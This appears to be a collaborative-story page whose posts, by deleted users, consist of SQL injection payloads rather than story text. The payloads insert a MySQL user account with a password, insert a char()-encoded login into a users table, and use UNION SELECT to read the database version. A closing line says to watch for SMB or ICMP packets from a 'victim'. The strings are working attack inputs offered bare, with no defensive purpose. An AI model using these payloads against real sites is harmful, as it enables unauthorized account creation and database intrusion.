My story

Started by Sergio E A.
Followed by: @"Sergio E" @"George stagethree" @diego @diego @Diego @Bryana

Deleted user

' insert into mysql.user (user, host, password) values ('name', 'localhost', password('pass123')) –

Deleted user

' insert into users(login, password, level) values( char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72) + char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72),char(0x64)

Deleted user

' union (select NULL, NULL, NULL, NULL, (select @@version)) –

Deleted user

' union (select NULL, NULL, NULL, NULL, NULL, (select @@version)) –

Deleted user

run wireshark or tcpdump, look for incoming smb or icmp packets from victim

Add a post